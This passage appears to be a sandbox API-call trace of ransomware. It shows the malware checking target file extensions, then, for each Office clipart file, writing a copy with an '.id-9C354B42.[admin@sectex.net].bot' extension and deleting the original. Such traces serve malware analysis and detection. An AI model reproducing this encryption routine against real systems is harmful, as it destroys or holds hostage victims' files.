	[0154.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.380] lstrlenW (lpString=".doc") returned 4
	[0154.380] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.380] lstrlenW (lpString=".docx") returned 5
	[0154.380] lstrcmpiW (lpString1=".docx", lpString2="0.GIF") returned -1
	[0154.380] lstrlenW (lpString=".pdf") returned 4
	[0154.381] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.381] lstrlenW (lpString=".xls") returned 4
	[0154.381] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.381] lstrlenW (lpString=".xlsx") returned 5
	[0154.381] lstrcmpiW (lpString1=".xlsx", lpString2="0.GIF") returned -1
	[0154.381] lstrlenW (lpString=".ppt") returned 4
	[0154.381] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.381] lstrlenW (lpString=".zip") returned 4
	[0154.381] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.381] lstrlenW (lpString=".rar") returned 4
	[0154.381] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.381] lstrlenW (lpString=".bz2") returned 4
	[0154.381] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.381] lstrlenW (lpString=".7z") returned 3
	[0154.381] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.381] lstrlenW (lpString=".dbf") returned 4
	[0154.381] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.381] lstrlenW (lpString=".1cd") returned 4
	[0154.381] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.381] lstrlenW (lpString=".jpg") returned 4
	[0154.381] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.381] lstrlenW (lpString=".doc") returned 4
	[0154.381] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.381] lstrlenW (lpString=".docx") returned 5
	[0154.382] lstrcmpiW (lpString1=".docx", lpString2="0.GIF") returned -1
	[0154.382] lstrlenW (lpString=".pdf") returned 4
	[0154.382] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.382] lstrlenW (lpString=".xls") returned 4
	[0154.382] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.382] lstrlenW (lpString=".xlsx") returned 5
	[0154.382] lstrcmpiW (lpString1=".xlsx", lpString2="0.GIF") returned -1
	[0154.382] lstrlenW (lpString=".ppt") returned 4
	[0154.382] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.382] lstrlenW (lpString=".zip") returned 4
	[0154.382] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.382] lstrlenW (lpString=".rar") returned 4
	[0154.382] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.382] lstrlenW (lpString=".bz2") returned 4
	[0154.382] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.382] lstrlenW (lpString=".7z") returned 3
	[0154.382] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.382] lstrlenW (lpString=".dbf") returned 4
	[0154.382] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.382] lstrlenW (lpString=".1cd") returned 4
	[0154.382] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
	[0154.382] lstrlenW (lpString=".jpg") returned 4
	[0154.382] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.383] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0154.383] lstrlenW (lpString="J0099205.WMF") returned 12
	[0154.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0154.497] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=17854) returned 1
	[0154.497] CloseHandle (hObject=0x384) returned 1
	[0154.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf")) returned 0x20
	[0154.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0154.805] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.805] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0154.807] GetLastError () returned 0x0
	[0154.807] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x45be, lpOverlapped=0x0) returned 1
	[0154.946] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x45c0, lpOverlapped=0x0) returned 1
	[0154.947] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.947] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.947] SetEndOfFile (hFile=0x31c) returned 1
	[0155.476] CloseHandle (hObject=0x31c) returned 1
	[0155.476] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.476] SetEndOfFile (hFile=0x3c0) returned 1
	[0155.479] CloseHandle (hObject=0x3c0) returned 1
	[0155.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.745] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf")) returned 1
	[0155.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.760] lstrlenW (lpString=".doc") returned 4
	[0155.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.760] lstrlenW (lpString=".docx") returned 5
	[0155.760] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0155.760] lstrlenW (lpString=".pdf") returned 4
	[0155.761] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString=".xls") returned 4
	[0155.761] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.761] lstrlenW (lpString=".xlsx") returned 5
	[0155.761] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0155.761] lstrlenW (lpString=".ppt") returned 4
	[0155.761] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.761] lstrlenW (lpString=".zip") returned 4
	[0155.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.761] lstrlenW (lpString=".rar") returned 4
	[0155.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString=".bz2") returned 4
	[0155.761] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString=".7z") returned 3
	[0155.761] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.761] lstrlenW (lpString=".dbf") returned 4
	[0155.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.761] lstrlenW (lpString=".1cd") returned 4
	[0155.761] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.761] lstrlenW (lpString=".jpg") returned 4
	[0155.761] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.761] lstrlenW (lpString=".doc") returned 4
	[0155.761] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.761] lstrlenW (lpString=".docx") returned 5
	[0155.762] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0155.762] lstrlenW (lpString=".pdf") returned 4
	[0155.762] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.762] lstrlenW (lpString=".xls") returned 4
	[0155.762] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.762] lstrlenW (lpString=".xlsx") returned 5
	[0155.762] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0155.762] lstrlenW (lpString=".ppt") returned 4
	[0155.762] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.762] lstrlenW (lpString=".zip") returned 4
	[0155.762] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.762] lstrlenW (lpString=".rar") returned 4
	[0155.762] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.762] lstrlenW (lpString=".bz2") returned 4
	[0155.762] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.762] lstrlenW (lpString=".7z") returned 3
	[0155.762] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.762] lstrlenW (lpString=".dbf") returned 4
	[0155.762] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.762] lstrlenW (lpString=".1cd") returned 4
	[0155.762] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 63
	[0155.762] lstrlenW (lpString=".jpg") returned 4
	[0155.762] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.763] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.763] lstrlenW (lpString="J0102002.WMF") returned 12
	[0155.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0155.772] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=15988) returned 1
	[0155.772] CloseHandle (hObject=0x3d4) returned 1
	[0155.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf")) returned 0x20
	[0155.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0155.772] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.772] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0155.773] GetLastError () returned 0x0
	[0155.773] ReadFile (in: hFile=0x3d4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3e74, lpOverlapped=0x0) returned 1
	[0155.792] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3e80, lpOverlapped=0x0) returned 1
	[0155.793] ReadFile (in: hFile=0x3d4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.794] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.794] SetEndOfFile (hFile=0x388) returned 1
	[0155.794] CloseHandle (hObject=0x388) returned 1
	[0155.794] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.794] SetEndOfFile (hFile=0x3d4) returned 1
	[0155.796] CloseHandle (hObject=0x3d4) returned 1
	[0155.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.859] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf")) returned 1
	[0155.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.860] lstrlenW (lpString=".doc") returned 4
	[0155.860] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.860] lstrlenW (lpString=".docx") returned 5
	[0155.860] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0155.860] lstrlenW (lpString=".pdf") returned 4
	[0155.860] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.860] lstrlenW (lpString=".xls") returned 4
	[0155.860] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.860] lstrlenW (lpString=".xlsx") returned 5
	[0155.861] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0155.861] lstrlenW (lpString=".ppt") returned 4
	[0155.861] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.861] lstrlenW (lpString=".zip") returned 4
	[0155.861] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.861] lstrlenW (lpString=".rar") returned 4
	[0155.861] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString=".bz2") returned 4
	[0155.861] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString=".7z") returned 3
	[0155.861] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.861] lstrlenW (lpString=".dbf") returned 4
	[0155.861] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.861] lstrlenW (lpString=".1cd") returned 4
	[0155.861] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.861] lstrlenW (lpString=".jpg") returned 4
	[0155.861] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.861] lstrlenW (lpString=".doc") returned 4
	[0155.861] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.861] lstrlenW (lpString=".docx") returned 5
	[0155.861] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0155.861] lstrlenW (lpString=".pdf") returned 4
	[0155.861] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.862] lstrlenW (lpString=".xls") returned 4
	[0155.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.862] lstrlenW (lpString=".xlsx") returned 5
	[0155.862] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0155.862] lstrlenW (lpString=".ppt") returned 4
	[0155.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.862] lstrlenW (lpString=".zip") returned 4
	[0155.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.862] lstrlenW (lpString=".rar") returned 4
	[0155.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.862] lstrlenW (lpString=".bz2") returned 4
	[0155.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.862] lstrlenW (lpString=".7z") returned 3
	[0155.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.862] lstrlenW (lpString=".dbf") returned 4
	[0155.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.862] lstrlenW (lpString=".1cd") returned 4
	[0155.862] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 63
	[0155.862] lstrlenW (lpString=".jpg") returned 4
	[0155.862] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.862] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.862] lstrlenW (lpString="J0102762.WMF") returned 12
	[0155.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.863] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11216) returned 1
	[0155.863] CloseHandle (hObject=0x39c) returned 1
	[0155.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf")) returned 0x20
	[0155.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.864] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.864] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0155.864] GetLastError () returned 0x0
	[0155.864] ReadFile (in: hFile=0x39c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2bd0, lpOverlapped=0x0) returned 1
	[0155.892] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2be0, lpOverlapped=0x0) returned 1
	[0155.893] ReadFile (in: hFile=0x39c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.893] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.893] SetEndOfFile (hFile=0x3d0) returned 1
	[0155.893] CloseHandle (hObject=0x3d0) returned 1
	[0155.893] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.893] SetEndOfFile (hFile=0x39c) returned 1
	[0155.895] CloseHandle (hObject=0x39c) returned 1
	[0155.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.910] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf")) returned 1
	[0155.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.911] lstrlenW (lpString=".doc") returned 4
	[0155.911] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.911] lstrlenW (lpString=".docx") returned 5
	[0155.911] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0155.911] lstrlenW (lpString=".pdf") returned 4
	[0155.911] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
